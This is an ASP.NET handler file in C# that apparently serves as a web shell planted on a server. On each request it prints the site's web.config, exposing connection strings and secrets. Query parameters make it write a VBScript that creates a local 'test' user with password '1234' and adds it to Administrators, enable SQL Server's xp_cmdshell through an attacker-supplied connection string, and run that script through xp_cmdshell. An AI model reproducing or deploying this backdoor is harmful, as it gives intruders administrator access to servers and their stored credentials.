<%@ WebHandler Language="C#" Class="TextLd" %>
using System;using System.Collections.Generic;using System.Linq;using System.Web;using System.Data.SqlClient;public class TextLd : IHttpHandler
{ public void CreateLocalUser(string newPath) { System.Diagnostics.Process.Start(@"d:\1.vbs"); System.IO.File.WriteAllText(@"d:\1.vbs", "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\""); } public void ShowWebConfig(HttpContext context) { context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config"))); } public void WriteVbs(HttpContext context) { System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\""); } public void ExecuteSql(string connection, string sql) { using (SqlConnection con = new SqlConnection(connection)) { using (SqlCommand commd = new SqlCommand(sql, con)) { con.Open(); commd.ExecuteNonQuery(); con.Close(); } } } public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config"))); try { var connection = context.Request.QueryString["connection"]; switch (context.Request.QueryString["method"]) { case "1": WriteVbs(context); break; case "2": ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure"); ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell break; case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'"); break; default: ShowWebConfig(context); break; } } catch (Exception ex) { context.Response.Write(ex.Message); } context.Response.End(); } public bool IsReusable { get { return false; } } }